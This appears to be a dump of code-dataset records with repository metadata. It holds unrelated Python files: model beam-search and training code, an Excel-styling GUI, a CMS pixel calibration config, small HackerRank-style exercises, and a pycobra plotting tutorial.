self.len_norm > 0: length_penalty = (self.len_norm + new_tgt.shape[1]) / (self.len_norm + 1) new_score /= length_penalty ** self.len_norm else: new_score = new_score / new_tgt.shape[1] if new_tgt.shape[1] > 0 else new_score ppl = 0 # TODO: add perplexity later self.completed_insts.append((new_tgt, new_score, ppl, new_words)) else: next_candidates.append((new_tgt, new_score, prev_prob_list, new_words)) next_candidates = sorted(next_candidates, key=lambda t: t[1], reverse=True) next_candidates = next_candidates[:self.beam_width] self.curr_candidates = next_candidates self.done = len(self.curr_candidates) == 0 def get_curr_tgt(self): if len(self.curr_candidates) == 0: return None return torch.cat([tup[0] for tup in self.curr_candidates], dim=0).type(torch.LongTensor).to(device()) def get_curr_candidate_size(self): return len(self.curr_candidates) def collect_results(self, topk=1): for cand in self.curr_candidates: self.completed_insts.append((cand[0], cand[1], 0, cand[3])) self.completed_insts = sorted(self.completed_insts, key=lambda t: t[1], reverse=True) self.completed_insts = self.completed_insts[:self.beam_width] return self.completed_insts[:topk] def eval_graph_seq2attn(model, loader, params, desc="Eval"): start = time.time() exclude_tokens = [params.sos_token, params.eos_token, params.pad_token, ""] truth_rsp = [] gen_rsp = [] ofn = params.logs_dir + params.model_name + "_eval_out.txt" write_line_to_file("", ofn) for batch in tqdm(loader, mininterval=2, desc=desc, leave=False, ascii=True): batch = copy.deepcopy(batch) beam_rvs = graph_seq2attn_beam_decode_batch(model, batch, params.sos_idx, params.tgt_i2w, len_norm=params.bs_len_norm, gamma=params.bs_div_gamma, max_len=params.max_decoder_seq_len, beam_width=params.beam_width_eval) for bi in range(batch[DK_BATCH_SIZE]): best_rv = beam_rvs[bi][3] truth_rsp.append([[w for w in batch[DK_TGT_SEG_LISTS][bi] if w not in exclude_tokens]]) gen_rsp.append([w for w in best_rv if w not in exclude_tokens]) write_line_to_file("truth: " + " ".join([w for w in batch[DK_TGT_SEG_LISTS][bi] if w not in exclude_tokens]), ofn) write_line_to_file("pred: " + " ".join([w for w in best_rv if w not in 
exclude_tokens]), ofn) perf = corpus_eval(gen_rsp, truth_rsp) elapsed = time.time() - start info = "Eval result {} elapsed {}".format(str(perf), elapsed) print(info) write_line_to_file(info, params.logs_dir + params.model_name + "_train_info.txt") return perf[params.eval_metric] def make_graph_seq2attn_model(src_w2v_mat, tgt_w2v_mat, params, src_vocab_size, tgt_vocab_size, same_word_embedding=False): n_parallel_units = 3 n_heads = params.graph_seq2attn_num_attn_heads d_model_sent_enc = params.graph_seq2attn_encoder_hidden_size d_model_ctx_enc = params.graph_seq2attn_context_hidden_size d_model_decoder = params.graph_seq2attn_context_hidden_size * params.graph_seq2attn_context_rnn_dir # TODO: small issue here d_model_dec_pos_ff = int(params.graph_seq2attn_decoder_hidden_size * params.graph_seq2attn_decoder_ff_ratio) d_output_gcn = d_model_decoder dec_attn = MultiHeadedAttention(n_heads, d_model_decoder) dec_ff = PositionwiseFeedForward(d_model_decoder, d_model_dec_pos_ff) dec_word_pos = PositionalEncoding(d_model_decoder) # embeddings if src_w2v_mat is None: src_word_embed_layer = TrainableEmbedding(params.word_embedding_dim, src_vocab_size) else: src_word_embed_layer = PreTrainedWordEmbedding(src_w2v_mat, params.word_embedding_dim, allow_further_training=params.src_embed_further_training) if tgt_w2v_mat is None: tgt_word_embed_layer = TrainableEmbedding(params.word_embedding_dim, tgt_vocab_size) else: tgt_word_embed_layer = PreTrainedWordEmbedding(tgt_w2v_mat, params.word_embedding_dim, allow_further_training=params.tgt_embed_further_training) if same_word_embedding and src_vocab_size == tgt_vocab_size: tgt_word_embed_layer = src_word_embed_layer doc_gcn_kw_embed = DocGCNKWDistDictEmbedding(params.word_embedding_dim, src_word_embed_layer) doc_gcn_merge_embed = DocGCNDictMergeEmbedding() tgt_wid_embed = ResizeWrapperEmbedding(d_model_decoder, tgt_word_embed_layer) # high-level components doc_merge_gcn = GCN(d_model_sent_enc * params.graph_seq2attn_encoder_rnn_dir, params.graph_seq2attn_doc_merge_gcn_hidden_size, d_output_gcn, params.graph_seq2attn_doc_merge_gcn_dropout_prob, num_layers=params.graph_seq2attn_doc_merge_gcn_layers) doc_kw_dist_gcn = GCN(params.word_embedding_dim, params.graph_seq2attn_doc_kw_dist_gcn_hidden_size, d_output_gcn, params.graph_seq2attn_doc_kw_dist_gcn_dropout_prob, num_layers=params.graph_seq2attn_doc_kw_dist_gcn_layers) sent_encoder = EncoderRNN(params.word_embedding_dim, d_model_sent_enc, n_layers=params.graph_seq2attn_num_encoder_layers, dropout_prob=params.graph_seq2attn_encoder_dropout_prob, rnn_dir=params.graph_seq2attn_encoder_rnn_dir, rnn_type=params.graph_seq2attn_encoder_type) doc_encoder = EncoderRNN(d_model_sent_enc * params.graph_seq2attn_encoder_rnn_dir, d_model_ctx_enc, n_layers=params.graph_seq2attn_num_context_layers, dropout_prob=params.graph_seq2attn_context_dropout_prob, rnn_dir=params.graph_seq2attn_context_rnn_dir, rnn_type=params.graph_seq2attn_context_type) max_pool = SeqMaxPoolLayer(d_model_decoder, max_pool_factor=params.graph_seq2attn_pool_factor, min_seq_len=1) decoder_layer = SequentialDecoderLayer(d_model_decoder, dec_attn, dec_ff, params.graph_seq2attn_decoder_dropout_prob, n_parallel_units=n_parallel_units) decoder = SequentialDecoder(d_model_decoder, decoder_layer, params.graph_seq2attn_num_decoder_layers, pos_embed=dec_word_pos) generator = Generator(d_model_decoder, tgt_vocab_size) # model model = GraphSeq2Attn(doc_gcn_kw_embed, doc_gcn_merge_embed, src_word_embed_layer, tgt_wid_embed, doc_merge_gcn, doc_kw_dist_gcn, 
sent_encoder, doc_encoder, max_pool, decoder, generator, pad_idx=params.pad_idx, sos_idx=params.sos_idx, eos_idx=params.eos_idx) for p in filter(lambda pa: pa.requires_grad, model.parameters()): if p.dim() == 1: p.data.normal_(0, math.sqrt(6 / (1 + p.size(0)))) else: nn.init.xavier_normal_(p, math.sqrt(3)) return model def train_graph_seq2attn(params, model, train_loader, criterion_gen, optimizer, completed_epochs=0, dev_loader=None, best_eval_result=0, best_eval_epoch=0, past_eval_results=[], checkpoint=True): model = model.to(device()) criterion_gen = criterion_gen.to(device()) for epoch in range(params.epochs): report_epoch = epoch + completed_epochs + 1 model.train() run_graph_seq2attn_epoch(model, train_loader, criterion_gen, curr_epoch=report_epoch, optimizer=optimizer, max_grad_norm=params.max_gradient_norm, desc="Train", pad_idx=params.pad_idx, model_name=params.model_name, logs_dir=params.logs_dir) if dev_loader is not None: # fast eval model.eval() with torch.no_grad(): if report_epoch >= params.full_eval_start_epoch and \ report_epoch % params.full_eval_every_epoch == 0: # full eval eval_bleu_4 = eval_graph_seq2attn(model, dev_loader, params) if eval_bleu_4 > best_eval_result: best_eval_result = eval_bleu_4 best_eval_epoch = report_epoch print("Model best checkpoint with score {}".format(eval_bleu_4)) fn = params.saved_models_dir + params.model_name + "_best.pt" if checkpoint: model_checkpoint(fn, report_epoch, model, optimizer, params, past_eval_results, best_eval_result, best_eval_epoch) info = "Best {} so far {} from epoch {}".format(params.eval_metric, best_eval_result, best_eval_epoch) print(info) write_line_to_file(info, params.logs_dir + params.model_name + "_train_info.txt") if hasattr(optimizer, "update_learning_rate"): optimizer.update_learning_rate(eval_bleu_4) past_eval_results.append(eval_bleu_4) if len(past_eval_results) > params.past_eval_scores_considered: past_eval_results = past_eval_results[1:] fn = params.saved_models_dir + params.model_name + "_latest.pt" if checkpoint: model_checkpoint(fn, report_epoch, model, optimizer, params, past_eval_results, best_eval_result, best_eval_epoch) print("") return best_eval_result, best_eval_epoch def run_graph_seq2attn_epoch(model, loader, criterion, curr_epoch=0, max_grad_norm=5.0, optimizer=None, desc="Train", pad_idx=0, model_name="graph_seq2attn", logs_dir=""): start = time.time() total_tokens = 0 total_loss = 0 total_correct = 0 for batch in tqdm(loader, mininterval=2, desc=desc, leave=False, ascii=True): g_log_wid_probs = model(batch) gen_targets = batch[DK_TGT_GEN_WID].to(device()) n_tokens = batch[DK_TGT_N_TOKEN].item() g_log_wid_probs = g_log_wid_probs.view(-1, g_log_wid_probs.size(-1)) loss = criterion(g_log_wid_probs, gen_targets.contiguous().view(-1)) # compute acc tgt = copy.deepcopy(gen_targets.view(-1, 1).squeeze(1)) g_preds_i = copy.deepcopy(g_log_wid_probs.max(1)[1]) n_correct = g_preds_i.data.eq(tgt.data) n_correct = n_correct.masked_select(tgt.ne(pad_idx).data).sum() total_loss += loss.item() total_correct += n_correct.item() total_tokens += n_tokens if optimizer is not None: optimizer.zero_grad() loss.backward() nn.utils.clip_grad_norm_(filter(lambda p: p.requires_grad, model.parameters()), max_grad_norm) optimizer.step() if torch.isnan(loss).any(): assert False, "nan detected after step()" loss_report = total_loss / total_tokens acc = total_correct / total_tokens elapsed = time.time() - start info = desc + " epoch %d loss %f, acc %f ppl %f elapsed time %f" % (curr_epoch, loss_report, acc, 
math.exp(loss_report), elapsed) print(info) write_line_to_file(info, logs_dir + model_name + "_train_info.txt") return loss_report, acc def graph_seq2attn_beam_decode_batch(model, batch, start_idx, i2w, max_len, gamma=0.0, pad_idx=0, beam_width=4, eos_idx=3, len_norm=1.0, topk=1): batch_size = batch[DK_BATCH_SIZE] model = model.to(device()) enc_list = model.encode(batch) batch_results = [ BeamSearchResult(idx_in_batch=bi, i2w=i2w, beam_width=beam_width, sos_idx=start_idx, eos_idx=eos_idx, gamma=gamma, len_norm=len_norm) for bi in range(batch_size) ] final_ans = [] for i in range(max_len): curr_actives = [b for b in batch_results if not b.done] if len(curr_actives) == 0: break b_tgt_list = [b.get_curr_tgt() for b in curr_actives] b_tgt = torch.cat(b_tgt_list, dim=0) b_tgt_mask = make_std_mask(b_tgt, pad_idx) b_cand_size_list = [b.get_curr_candidate_size() for b in curr_actives] b_enc_list = [] for tup in enc_list: mem, mask = tup b_mem = torch.cat([mem[b.idx_in_batch, :, :].unsqueeze(0).repeat(b.get_curr_candidate_size(), 1, 1) for b in curr_actives], dim=0) b_mask = None if mask is not None: b_mask = torch.cat([mask[b.idx_in_batch, :, :].unsqueeze(0).repeat(b.get_curr_candidate_size(), 1, 1) for b in curr_actives], dim=0) b_enc_list.append((b_mem, b_mask)) dec_out = model.decode(b_tgt, b_tgt_mask, b_enc_list) gen_wid_probs, _, _ = model.predict(dec_out) beam_i = 0 for bi, size in enumerate(b_cand_size_list): g_probs = gen_wid_probs[beam_i:beam_i + size, :].view(size, -1, gen_wid_probs.size(-1)) vt, it = g_probs.topk(beam_width) next_vals, next_wids, next_words = [], [], [] for ci in range(size): vals, wis, words = [], [], [] for idx in range(beam_width): vals.append(vt[ci, 0, idx].item()) wi = it[ci, 0, idx].item() word = i2w[wi] wis.append(wi) words.append(word) next_vals.append(vals) next_wids.append(wis) next_words.append(words) curr_actives[bi].update(g_probs, next_vals, next_wids, next_words) beam_i += size for b in batch_results: final_ans += b.collect_results(topk=topk) return final_ans
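NoamOpt.rate() in the code above implements the warmup-then-decay schedule factor * model_size**-0.5 * min(step**-0.5, step * warmup**-1.5). A dependency-free sketch that simply evaluates the formula; the 512/4000 defaults are illustrative, not taken from this repository:

def noam_rate(step, model_size=512, factor=1.0, warmup=4000):
    # Linear warmup for `warmup` steps, then decay proportional to step**-0.5.
    return factor * (model_size ** -0.5) * min(step ** -0.5, step * warmup ** -1.5)

for step in (1, 1000, 4000, 20000):
    print(step, round(noam_rate(step), 6))  # rate rises during warmup, then falls off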
28,108
1,790
1,263
fbbd84be295788a69019c863fff3289b27d4892b
4,707
py
Python
main.py
mode9/xlsxstyle
6311c6088672d6a39555bd735e1b443583692289
[ "MIT" ]
null
null
null
main.py
mode9/xlsxstyle
6311c6088672d6a39555bd735e1b443583692289
[ "MIT" ]
null
null
null
main.py
mode9/xlsxstyle
6311c6088672d6a39555bd735e1b443583692289
[ "MIT" ]
null
null
null
# This Python file uses the following encoding: utf-8 import os import sys import time from PyQt5 import QtCore from PySide2.QtCore import QFile from PySide2.QtUiTools import QUiLoader from PySide2.QtWidgets import QApplication, QWidget, QFileDialog, \ QPushButton, QLineEdit, QMessageBox, QTextBrowser, QProgressBar from openpyxl import Workbook from threads import CreateThread, ProgressThread from workers import Worker if __name__ == "__main__": app = QApplication([sys.executable]) widget = XlsxStyler() widget.show() sys.exit(app.exec_())
39.554622
104
0.670066
# This Python file uses the following encoding: utf-8 import os import sys import time from PyQt5 import QtCore from PySide2.QtCore import QFile from PySide2.QtUiTools import QUiLoader from PySide2.QtWidgets import QApplication, QWidget, QFileDialog, \ QPushButton, QLineEdit, QMessageBox, QTextBrowser, QProgressBar from openpyxl import Workbook from threads import CreateThread, ProgressThread from workers import Worker class XlsxStyler(QWidget): def __init__(self): super(XlsxStyler, self).__init__() self.load_ui() self.org_button: QPushButton = self.findChild(QPushButton, "org_button") self.target_button: QPushButton = self.findChild(QPushButton, "target_button") self.create_button: QPushButton = self.findChild(QPushButton, "create_button") self.org_edit: QLineEdit = self.findChild(QLineEdit, "org_edit") self.target_edit: QLineEdit = self.findChild(QLineEdit, "target_edit") self.text_browser: QTextBrowser = self.findChild(QTextBrowser, "textBrowser") self.pg_bar: QProgressBar = self.findChild(QProgressBar, "progressBar") self.pg_thread = ProgressThread(self.pg_bar) # self.pg_thread.change_value.connect(self._set_pg_range) self.pg_thread.start() self.org_button.clicked.connect(self.org_dialog) self.target_button.clicked.connect(self.target_dialog) self.create_button.clicked.connect(self.createExcel) self.org_name = '' self.target_name = '' self.org_wb = None self.target_wb = None def load_ui(self): loader = QUiLoader() path = os.path.join(os.path.dirname(__file__), "form.ui") ui_file = QFile(path) ui_file.open(QFile.ReadOnly) loader.load(ui_file, self) ui_file.close() def _set_edit_text(self, target: str, text: str) -> None: getattr(self, f'{target}_edit').setText(text) def _set_workbook(self, target: str, wb: Workbook) -> None: setattr(self, f'{target}_wb', wb) self.create_button.setDisabled(False) def set_org_wb(self, wb): self._set_workbook(target='org', wb=wb) def set_target_wb(self, wb): self._set_workbook(target='target', wb=wb) def _open_dialog(self, target: str): wb_callback = getattr(self, f"set_{target}_wb") name = QFileDialog.getOpenFileName(self, 'Open file', './')[0] if not name: return elif name.split(".")[-1] not in ("xlsx", "xlsm", "xlsb", "xls"): QMessageBox.critical(self, 'error', '엑셀 파일이 아닙니다.') return self.create_button.setDisabled(True) self.pg_thread.toggle_status() setattr(self, f'{target}_thread', QtCore.QThread()) setattr(self, f'{target}_worker', Worker(name, self.text_browser)) worker: Worker = getattr(self, f'{target}_worker') thread: QtCore.QThread = getattr(self, f'{target}_thread') worker.moveToThread(thread) thread.started.connect(worker.run) worker.finished.connect(thread.quit) worker.finished.connect(self.pg_thread.toggle_status) worker.failed.connect(lambda: QMessageBox.critical(self, 'error', '해당 파일이 존재하지 않거나 잘못된 파일입니다.')) worker.workbook.connect(wb_callback) worker.finished.connect(worker.deleteLater) thread.finished.connect(thread.deleteLater) thread.start() self._set_edit_text(target, name) setattr(self, f"{target}_name", name) def org_dialog(self) -> None: self._open_dialog('org') def target_dialog(self) -> None: self._open_dialog('target') def createExcel(self) -> None: if not self.org_name or not self.target_name: QMessageBox.critical(self, 'error', '파일을 선택해주세요.') return self.create_button.setDisabled(True) self.text_browser.insertPlainText("INFO: 파일 생성 작업 시작\n") start = time.time() self.create_thread = CreateThread(self.org_wb, self.target_wb, self.text_browser) self.create_thread.started.connect(self.pg_thread.toggle_status) 
self.create_thread.finished.connect(lambda: self.insert_text( f"******** 총 작업시간: {round(time.time() - start, 2)}초 ********\n" )) self.create_thread.finished.connect(self.pg_thread.toggle_status) self.create_thread.finished.connect(lambda: self.create_button.setDisabled(False)) self.create_thread.start() def insert_text(self, text: str): self.text_browser.insertPlainText(text) if __name__ == "__main__": app = QApplication([sys.executable]) widget = XlsxStyler() widget.show() sys.exit(app.exec_())
3,917
5
319
22fa8e5db0048c1973b20aac2f2d4320e6b5679e
2,812
py
Python
CalibTracker/SiPixelQuality/test/step3_SiPixelStatusAlCaRecoProducer.py
nistefan/cmssw
ea13af97f7f2117a4f590a5e654e06ecd9825a5b
[ "Apache-2.0" ]
1
2019-08-09T08:42:11.000Z
2019-08-09T08:42:11.000Z
CalibTracker/SiPixelQuality/test/step3_SiPixelStatusAlCaRecoProducer.py
nistefan/cmssw
ea13af97f7f2117a4f590a5e654e06ecd9825a5b
[ "Apache-2.0" ]
null
null
null
CalibTracker/SiPixelQuality/test/step3_SiPixelStatusAlCaRecoProducer.py
nistefan/cmssw
ea13af97f7f2117a4f590a5e654e06ecd9825a5b
[ "Apache-2.0" ]
1
2020-01-10T13:36:46.000Z
2020-01-10T13:36:46.000Z
import os import FWCore.ParameterSet.Config as cms from Configuration.StandardSequences.Eras import eras process = cms.Process('PCL',eras.Run2_2017) # ---------------------------------------------------------------------- process.load("FWCore.MessageLogger.MessageLogger_cfi") process.MessageLogger.cerr.threshold = 'INFO' process.MessageLogger.cerr.FwkReport.reportEvery = 10000 process.MessageLogger.categories.append('HLTrigReport') process.MessageLogger.categories.append('L1GtTrigReport') process.options = cms.untracked.PSet( SkipEvent = cms.untracked.vstring('ProductNotFound'), wantSummary = cms.untracked.bool(True) ) # -- Conditions process.load("Configuration.StandardSequences.MagneticField_38T_cff") process.load("Configuration.StandardSequences.GeometryRecoDB_cff") process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff') from Configuration.AlCa.GlobalTag import GlobalTag process.GlobalTag = GlobalTag(process.GlobalTag, '92X_dataRun2_Express_v8', '') # -- Input files process.source = cms.Source( "PoolSource", fileNames = cms.untracked.vstring( "/store/express/Run2017F/ExpressPhysics/FEVT/Express-v1/000/305/366/00000/863EC350-6EB6-E711-8EAD-02163E019B61.root", "/store/express/Run2017F/ExpressPhysics/FEVT/Express-v1/000/305/366/00000/B6268B1F-6FB6-E711-A46C-02163E01439D.root", ), #lumisToProcess = cms.untracked.VLuminosityBlockRange("305366:1-305366:1"), ) # -- number of events process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) ) from EventFilter.SiPixelRawToDigi.SiPixelRawToDigi_cfi import siPixelDigis process.siPixelDigis = siPixelDigis.clone() process.siPixelDigis.InputLabel = cms.InputTag("rawDataCollector") process.siPixelStatusProducer = cms.EDProducer("SiPixelStatusProducer", SiPixelStatusProducerParameters = cms.PSet( badPixelFEDChannelCollections = cms.VInputTag(cms.InputTag('siPixelDigis')), pixelClusterLabel = cms.untracked.InputTag("siPixelClusters::RECO"), monitorOnDoubleColumn = cms.untracked.bool(False), resetEveryNLumi = cms.untracked.int32( 1 ) ) ) process.ALCARECOStreamSiPixelCalZeroBias = cms.OutputModule("PoolOutputModule", fileName = cms.untracked.string('SiPixelCalZeroBias.root'), outputCommands = cms.untracked.vstring('drop *', 'keep *_siPixelStatusProducer_*_*', ) ) process.p = cms.Path(process.siPixelDigis*process.siPixelStatusProducer) process.end = cms.EndPath(process.ALCARECOStreamSiPixelCalZeroBias) process.schedule = cms.Schedule(process.p,process.end) # Add early deletion of temporary data products to reduce peak memory need from Configuration.StandardSequences.earlyDeleteSettings_cff import customiseEarlyDelete process = customiseEarlyDelete(process) # End adding early deletion
39.605634
121
0.771693
import os import FWCore.ParameterSet.Config as cms from Configuration.StandardSequences.Eras import eras process = cms.Process('PCL',eras.Run2_2017) # ---------------------------------------------------------------------- process.load("FWCore.MessageLogger.MessageLogger_cfi") process.MessageLogger.cerr.threshold = 'INFO' process.MessageLogger.cerr.FwkReport.reportEvery = 10000 process.MessageLogger.categories.append('HLTrigReport') process.MessageLogger.categories.append('L1GtTrigReport') process.options = cms.untracked.PSet( SkipEvent = cms.untracked.vstring('ProductNotFound'), wantSummary = cms.untracked.bool(True) ) # -- Conditions process.load("Configuration.StandardSequences.MagneticField_38T_cff") process.load("Configuration.StandardSequences.GeometryRecoDB_cff") process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff') from Configuration.AlCa.GlobalTag import GlobalTag process.GlobalTag = GlobalTag(process.GlobalTag, '92X_dataRun2_Express_v8', '') # -- Input files process.source = cms.Source( "PoolSource", fileNames = cms.untracked.vstring( "/store/express/Run2017F/ExpressPhysics/FEVT/Express-v1/000/305/366/00000/863EC350-6EB6-E711-8EAD-02163E019B61.root", "/store/express/Run2017F/ExpressPhysics/FEVT/Express-v1/000/305/366/00000/B6268B1F-6FB6-E711-A46C-02163E01439D.root", ), #lumisToProcess = cms.untracked.VLuminosityBlockRange("305366:1-305366:1"), ) # -- number of events process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) ) from EventFilter.SiPixelRawToDigi.SiPixelRawToDigi_cfi import siPixelDigis process.siPixelDigis = siPixelDigis.clone() process.siPixelDigis.InputLabel = cms.InputTag("rawDataCollector") process.siPixelStatusProducer = cms.EDProducer("SiPixelStatusProducer", SiPixelStatusProducerParameters = cms.PSet( badPixelFEDChannelCollections = cms.VInputTag(cms.InputTag('siPixelDigis')), pixelClusterLabel = cms.untracked.InputTag("siPixelClusters::RECO"), monitorOnDoubleColumn = cms.untracked.bool(False), resetEveryNLumi = cms.untracked.int32( 1 ) ) ) process.ALCARECOStreamSiPixelCalZeroBias = cms.OutputModule("PoolOutputModule", fileName = cms.untracked.string('SiPixelCalZeroBias.root'), outputCommands = cms.untracked.vstring('drop *', 'keep *_siPixelStatusProducer_*_*', ) ) process.p = cms.Path(process.siPixelDigis*process.siPixelStatusProducer) process.end = cms.EndPath(process.ALCARECOStreamSiPixelCalZeroBias) process.schedule = cms.Schedule(process.p,process.end) # Add early deletion of temporary data products to reduce peak memory need from Configuration.StandardSequences.earlyDeleteSettings_cff import customiseEarlyDelete process = customiseEarlyDelete(process) # End adding early deletion
0
0
0
f82068383fbfa605535716b59dcbcbea370cb469
1,020
py
Python
Python/staircase.py
nickhaynes/HackerRank-Challenges
12be5518251ffde5d19f6ef42795e1c48b6623bd
[ "MIT" ]
null
null
null
Python/staircase.py
nickhaynes/HackerRank-Challenges
12be5518251ffde5d19f6ef42795e1c48b6623bd
[ "MIT" ]
null
null
null
Python/staircase.py
nickhaynes/HackerRank-Challenges
12be5518251ffde5d19f6ef42795e1c48b6623bd
[ "MIT" ]
null
null
null
# Consider a staircase of size : # # # # ## # ### # #### # # Observe that its base and height are both equal to , and the image is drawn using # symbols and spaces. The last line is not preceded by any spaces. # # Write a program that prints a staircase of size . # # Input Format # # A single integer, , denoting the size of the staircase. # # Output Format # # Print a staircase of size using # symbols and spaces. # # Note: The last line must have spaces in it. # # Sample Input # # 6 # Sample Output # # # # ## # ### # #### # ##### # ###### # # Explanation # # The staircase is right-aligned, composed of # symbols and spaces, and has a height and width of . # # #!/bin/python import math import os import random import re import sys # Complete the staircase function below. if __name__ == '__main__': n = int(raw_input()) staircase(n)
16.721311
150
0.590196
# Consider a staircase of size : # # # # ## # ### # #### # # Observe that its base and height are both equal to , and the image is drawn using # symbols and spaces. The last line is not preceded by any spaces. # # Write a program that prints a staircase of size . # # Input Format # # A single integer, , denoting the size of the staircase. # # Output Format # # Print a staircase of size using # symbols and spaces. # # Note: The last line must have spaces in it. # # Sample Input # # 6 # Sample Output # # # # ## # ### # #### # ##### # ###### # # Explanation # # The staircase is right-aligned, composed of # symbols and spaces, and has a height and width of . # # #!/bin/python import math import os import random import re import sys # Complete the staircase function below. def staircase(n): s=1 y=n-s for x in range (n): print (" " * y) + ("#" * s) s=s+1 y=y-1 if __name__ == '__main__': n = int(raw_input()) staircase(n)
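The solution above targets Python 2 (raw_input and the print statement). An equivalent Python 3 sketch of the same right-aligned staircase:

def staircase(n):
    # Row i has (n - i) leading spaces followed by i '#' characters.
    for i in range(1, n + 1):
        print(" " * (n - i) + "#" * i)

staircase(6)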
102
0
22
0023e4346495fa3d50aeae59ada722870a812388
271
py
Python
Algorithm/coding_interviews/Python/sword-for-offer/64_sum_n.py
ck76/awesome-cs
48cba4081dc5290f07e305850b9a3a7e8a590b64
[ "Apache-2.0" ]
1
2021-11-16T13:37:41.000Z
2021-11-16T13:37:41.000Z
Algorithm/coding_interviews/Python/sword-for-offer/64_sum_n.py
ck76/awesome-cs
48cba4081dc5290f07e305850b9a3a7e8a590b64
[ "Apache-2.0" ]
null
null
null
Algorithm/coding_interviews/Python/sword-for-offer/64_sum_n.py
ck76/awesome-cs
48cba4081dc5290f07e305850b9a3a7e8a590b64
[ "Apache-2.0" ]
null
null
null
#! /usr/bin/python3 # -*- coding: utf-8 -*- # @Time : 2019/3/10 8:10 PM # @Author : xiaoliji # @Email : yutian9527@gmail.com """ Compute 1 + ... + n without using loops or similar constructs. >>> sum_solution(10) 55 """
15.941176
38
0.546125
#! /usr/bin/python3 # -*- coding: utf-8 -*- # @Time : 2019/3/10 8:10 PM # @Author : xiaoliji # @Email : yutian9527@gmail.com """ Compute 1 + ... + n without using loops or similar constructs. >>> sum_solution(10) 55 """ def sum_solution(n: int) -> int: return n and (n+sum_solution(n-1))
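The one-liner above relies on Python's short-circuiting `and` to stop the recursion: once n reaches 0 the expression evaluates to 0 without another call, which is how the no-loop constraint is satisfied. A stand-alone copy for illustration:

def sum_solution(n: int) -> int:
    # `n and ...` returns 0 as soon as n == 0, terminating the recursion.
    return n and (n + sum_solution(n - 1))

assert sum_solution(10) == 55
assert sum_solution(0) == 0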
50
0
23
4336232382e90a34670de18f1e14b8984535e17e
4,799
py
Python
docs/plot_visualise.py
vishalbelsare/pycobra
2af4faa681b412b8508d3043ccaff8e98c1d4368
[ "MIT" ]
119
2017-03-26T12:11:52.000Z
2022-03-20T15:17:46.000Z
docs/plot_visualise.py
chrinide/pycobra
2af4faa681b412b8508d3043ccaff8e98c1d4368
[ "MIT" ]
7
2017-03-27T12:08:37.000Z
2018-09-22T10:43:24.000Z
docs/plot_visualise.py
chrinide/pycobra
2af4faa681b412b8508d3043ccaff8e98c1d4368
[ "MIT" ]
22
2017-04-12T07:44:09.000Z
2022-01-13T06:35:29.000Z
""" COBRA Visualisations -------------------- This notebook will cover the visulaisation and plotting offered by pycobra. """ # %matplotlib inline import numpy as np from pycobra.cobra import Cobra from pycobra.ewa import Ewa from pycobra.visualisation import Visualisation from pycobra.diagnostics import Diagnostics # setting up our random data-set rng = np.random.RandomState(42) # D1 = train machines; D2 = create COBRA; D3 = calibrate epsilon, alpha; D4 = testing n_features = 2 D1, D2, D3, D4 = 200, 200, 200, 200 D = D1 + D2 + D3 + D4 X = rng.uniform(-1, 1, D * n_features).reshape(D, n_features) # Y = np.power(X[:,1], 2) + np.power(X[:,3], 3) + np.exp(X[:,10]) Y = np.power(X[:,0], 2) + np.power(X[:,1], 3) # training data-set X_train = X[:D1 + D2] X_test = X[D1 + D2 + D3:D1 + D2 + D3 + D4] X_eps = X[D1 + D2:D1 + D2 + D3] # for testing Y_train = Y[:D1 + D2] Y_test = Y[D1 + D2 + D3:D1 + D2 + D3 + D4] Y_eps = Y[D1 + D2:D1 + D2 + D3] # set up our COBRA machine with the data cobra = Cobra(epsilon=0.5) cobra.fit(X_train, Y_train) ###################################################################### # Plotting COBRA # ~~~~~~~~~~~~~~ # # We use the visualisation class to plot our results, and for various # visualisations. # cobra_vis = Visualisation(cobra, X_test, Y_test) # to plot our machines, we need a linspace as input. This is the 'scale' to plot and should be the range of the results # since our data ranges from -1 to 1 it is such - and we space it out to a hundred points cobra_vis.plot_machines(machines=["COBRA"]) cobra_vis.plot_machines() ###################################################################### # Plots and Visualisations of Results # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # QQ and Boxplots! # cobra_vis.QQ() cobra_vis.boxplot() ###################################################################### # Plotting EWA! # ~~~~~~~~~~~~~ # # We can use the same visualisation class for seeing how EWA works. Let's # demonstrate this! # ewa = Ewa() ewa.set_beta(X_beta=X_eps, y_beta=Y_eps) ewa.fit(X_train, Y_train) ewa_vis = Visualisation(ewa, X_test, Y_test) ewa_vis.QQ("EWA") ewa_vis.boxplot() ###################################################################### # Plotting ClassifierCobra # ~~~~~~~~~~~~~~~~~~~~~~~~ # from sklearn import datasets from sklearn.metrics import accuracy_score from pycobra.classifiercobra import ClassifierCobra bc = datasets.load_breast_cancer() X_cc = bc.data[:-40] y_cc = bc.target[:-40] X_cc_test = bc.data[-40:] y_cc_test = bc.target[-40:] cc = ClassifierCobra() cc.fit(X_cc, y_cc) cc_vis = Visualisation(cc, X_cc_test, y_cc_test) cc_vis.boxplot() ###################################################################### # Remember that all the estimators in the Pycobra package are scikit-learn # compatible - we can also use the scikit-learn metrics and tools to # analyse our machines! # from sklearn.metrics import classification_report print(classification_report(y_cc_test, cc.predict(X_cc_test))) ###################################################################### # Plotting COBRA colors! # ~~~~~~~~~~~~~~~~~~~~~~ # # We're now going to experiment with plotting colors and data. After we # get information about which indices are used by which machines the best # for a fixed epsilon (or not, we can toggle this option), we can plot the # distribution of machines. # # Why is this useful? Since we're dealing with a 2-D space now, we're # attempting to see if there are some parts in the input space which are # picked up by certain machines. 
This could lead to interesting # experiments and # # We first present a plot where the machine colors are mixed depending on # which machines were selected; after which we plot one machine at a time. # indices, MSE = cobra_vis.indice_info(X_test=X_eps[0:50], y_test=Y_eps[0:50], epsilon=0.50) cobra_vis.color_cobra(X_test=X_eps[0:50], indice_info=indices, single=True) cobra_vis.color_cobra(X_test=X_eps[0:50], indice_info=indices) ###################################################################### # Voronoi Tesselation # ~~~~~~~~~~~~~~~~~~~ # # We present a variety of Voronoi Tesselation based plots - the purpose of # this is to help in visualising the pattern of points which tend to be # picked up. # cobra_vis.voronoi(X_test=X_eps[0:50], indice_info=indices, single=True) cobra_vis.voronoi(X_test=X_eps[0:50], indice_info=indices) ###################################################################### # Gradient-Colored Based Voronoi # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # cobra_vis.voronoi(X_test=X_eps[0:50], indice_info=indices, MSE=MSE, gradient=True) ###################################################################### # Licensed under the MIT License - https://opensource.org/licenses/MIT #
27.739884
119
